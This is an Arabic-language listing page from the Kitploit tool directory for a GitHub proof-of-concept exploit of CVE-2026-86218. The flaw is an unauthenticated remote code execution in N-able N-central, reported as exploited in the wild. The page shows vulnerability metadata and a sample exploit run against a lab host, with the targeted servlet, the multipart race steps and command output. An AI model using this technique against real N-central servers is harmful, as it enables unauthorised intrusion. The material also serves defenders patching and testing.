Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/udyz/cve-2026-86218
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubudyz/cve-2026-86218

CVE-2026-86218

استغلال إثبات المفهوم لـ CVE-2026-86218، وهو RCE غير مصادق عليه في N-able N-central عبر Struts BeanUtils، مع اكتشاف الإصدار وتنفيذ الأوامر.

عرض المستودع
منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-86218

CVE-2026-86218 - تنفيذ أوامر عن بُعد (RCE) بدون مصادقة في N-able N-central Struts BeanUtils

CVECVE-2026-86218
CVSS10.0 (حرج)
المتأثرN-central on-premises < 2026.3.1.14 (بما في ذلك Hotfix 3)
تم الإصلاح2026.3 Hotfix 4 (build 2026.3.1.14)
تاريخ الإفصاح2026-09-05
CWECWE-96 (حقن الكود الساكن)
الاستغلالنشط في البرية (CISA KEV)
root@kitploit:~
[*] Running version check ...
[*] Detected N-central version: 2026.3.1.10
[*] Vulnerable: True
[*] Target    : https://nc.lab:443
[*] Servlet   : LogRetrieval
[*] Trigger   : https://nc.lab:443/LogRetrieval/WEB-INF/web.xml
[*] Marker    : ecbddf8d8fe83376aabb4f1e81efd2d2
[+] JSESSIONID: node01bhudsdf7jmpktsh6e0qhjtsk185448.node0
[*] Padding prefix: 49847 bytes
[*] Body size     : 63849 bytes
[*] Split offset  : 50241 / 64142
[*] Sent partial request; sleeping 0.35s ...
[*] Helper response: HTTP 200
[*] Sent remaining mutation fields
[*] Mutation response head:
HTTP/1.1 200 OK
[*] Multipart race completed.
[*] Sending payload via LogRetrieval ...
[+] Response:
uid=984(nable) gid=984(nable) groups=984(nable) context=system_u:system_r:unconfined_service_t:s0
Linux nc.lab 5.14.0-611.54.3.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:31:24 EDT 2026 x86_64 x86_64 x86_64 GNU/Linux
ecbddf8d8fe83376aabb4f1e81efd2d2

[+] Marker observed in response — payload launched.
تنزيل الأداة